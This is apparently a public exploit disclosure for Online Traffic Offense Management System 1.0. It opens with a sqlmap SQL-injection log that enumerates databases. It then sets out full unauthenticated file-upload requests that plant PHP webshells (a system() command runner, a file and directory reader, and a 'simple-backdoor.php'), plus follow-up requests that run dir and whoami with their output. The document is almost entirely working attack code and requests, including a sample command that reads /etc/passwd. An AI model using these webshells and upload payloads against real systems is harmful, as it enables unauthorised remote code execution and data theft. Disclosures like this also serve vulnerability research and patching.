and filtering out [06:06:24] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.48, PHP 7.4.23 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [06:06:24] [INFO] fetching current user [06:06:24] [INFO] resumed: 'root@localhost' current user: 'root@localhost' [06:06:24] [INFO] fetching current database [06:06:24] [INFO] retrieved: 'traffic_offense_db' current database: 'traffic_offense_db' [06:06:24] [INFO] fetching database names [06:06:24] [INFO] retrieved: 'information_schema' [06:06:24] [INFO] retrieved: 'mysql' [06:06:24] [INFO] retrieved: 'performance_schema' [06:06:24] [INFO] retrieved: 'phpmyadmin' [06:06:24] [INFO] retrieved: 'test' [06:06:24] [INFO] retrieved: 'test2' [06:06:24] [INFO] retrieved: 'traffic_offense_db' available databases [7]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] test2 [*] traffic_offense_db [06:06:24] [INFO] fetched data logged to text files under 'C:\Users\Hubert\AppData\Local\sqlmap\output\localhost' [*] ending @ 06:06:24 /2021-10-07/

# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: [email protected] # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### RCE - Remote Code Execution # All requests can be sent by both an authenticated and a non-authenticated user # RCE - we can exploit the RCE vulnerability in several ways: * Drivers List can add any attachment as photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver * System information file add as system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info * User profile edit avatar - http://localhost/traffic_offense/admin/?page=user * Make new user and add evil avatar - http://localhost/traffic_offense/admin/?page=user/manage_user * Edit other user and change his avatar to webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2 ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1 # Request send as Unauthenticated user POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685 Content-Length: 1184 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=user/manage_user Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="id" -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="firstname" hacked -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="lastname" hacked -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="username" hacked -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="password" hacked -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="type" 1 -----------------------------210106920639395210803657370685 Content-Disposition: form-data; name="img"; filename="cmd.php" Content-Type: application/octet-stream <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="x"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <?php if($_REQUEST['x']) { system($_REQUEST['x']); } else phpinfo(); ?> </pre> </BODY></HTML> -----------------------------210106920639395210803657370685-- ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 07:59:24 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 ----------------------------------------------------------------------------------------------------------------------- # The file was uploaded to the uploads directory # Request to list files in uploads\ GET /traffic_offense/uploads/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:06:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 2139 Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /traffic_offense/uploads</title> </head> <body> <h1>Index of /traffic_offense/uploads</h1> <table> <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr> <tr><th colspan="5"><hr></th></tr> <tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/traffic_offense/">Parent Directory</a> </td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr> <tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629336240_avatar.jpg">1629336240_avatar.jpg</a> </td><td align="right">2021-08-19 09:24 </td><td align="right"> 11K</td><td>&nbsp;</td></tr> <tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629421080_tl-logo.png">1629421080_tl-logo.png</a> </td><td align="right">2021-08-20 08:58 </td><td align="right">5.2K</td><td>&nbsp;</td></tr> <tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1633584660_xss.svg">1633584660_xss.svg</a> </td><td align="right">2021-10-07 07:31 </td><td align="right">3.4K</td><td>&nbsp;</td></tr> <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="1633593540_cmd.php">1633593540_cmd.php</a> </td> [...] ----------------------------------------------------------------------------------------------------------------------- # Request to webshell GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:10:10 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 810 Connection: close Content-Type: text/html; charset=UTF-8 <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> Volume in drive C has no label. Volume Serial Number is 283C-C6A0 Directory of C:\xampp\htdocs\traffic_offense\uploads 07.10.2021 10:09 <DIR> . 07.10.2021 10:09 <DIR> .. 19.08.2021 09:24 11ÿ426 1629336240_avatar.jpg 20.08.2021 08:58 5ÿ288 1629421080_tl-logo.png 07.10.2021 07:31 3ÿ451 1633584660_xss.svg 07.10.2021 09:59 252 1633593540_cmd.php 07.10.2021 10:02 252 1633593720_cmd.php 07.10.2021 09:02 <DIR> drivers 5 File(s) 20ÿ669 bytes 3 Dir(s) 86ÿ494ÿ085ÿ120 bytes free </pre> </BODY></HTML> ----------------------------------------------------------------------------------------------------------------------- ## Example 2 # Webshell as System Logo and next webshell as Potal Cover in System Information page # Request POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833 Content-Length: 3176 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=system_info Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="name" Online Traffic Offense Management System - PHP -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="short_name" OTOMS - PHP -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="about_us" <p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sample only</p> -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="img"; filename="cmd.php" Content-Type: application/octet-stream <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <?php if($_REQUEST['x']) { system($_REQUEST['x']); } else phpinfo(); ?> </pre> </BODY></HTML> -----------------------------339921602532596419562348365833 Content-Disposition: form-data; name="cover"; filename="list.php" Content-Type: application/octet-stream <?php if($_GET['file']) { $fichero=$_GET['file']; } else { $fichero="/"; } if($handle = @opendir($fichero)) { while($filename = readdir($handle)) { echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>"; } closedir($handle); } else { echo "FILE: " . $fichero . "<br><hr><pre>"; $fp = fopen($fichero, "r"); $buffer = fread($fp, filesize($fichero)); echo $buffer; fclose($fp); } ?> -----------------------------339921602532596419562348365833-- ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:21:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 ----------------------------------------------------------------------------------------------------------------------- # The situation is the same as in the previous variant. Two files ripped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php ## Example 3 # Webshell as photo in driver list page # Request POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204 Content-Length: 2148 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="id" -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="license_id_no" vvvvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="lastname" vvvvvvvvvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="firstname" vvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="middlename" vvvvvvvvvvvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="dob" 2021-10-07 -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="present_address" vvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="permanent_address" vvvvvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="civil_status" Single -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="nationality" vvvvvvvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="contact" vvvvvvvv -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="license_type" Student -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="image_path" -----------------------------12210274961293066124133837204 Content-Disposition: form-data; name="img"; filename="simple-backdoor.php" Content-Type: application/octet-stream <!-- Simple PHP backdoor by DK (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd <!-- http://michaeldaw.org 2006 --> -----------------------------12210274961293066124133837204-- ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:35:21 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} ----------------------------------------------------------------------------------------------------------------------- # Request to webshell GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 08:39:15 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Access-Control-Allow-Origin: * Content-Length: 95 Connection: close Content-Type: text/html; charset=UTF-8 <!-- Simple PHP backdoor by DK (http://michaeldaw.org) --> <pre>desktop-uhrf0c6\hubert </pre>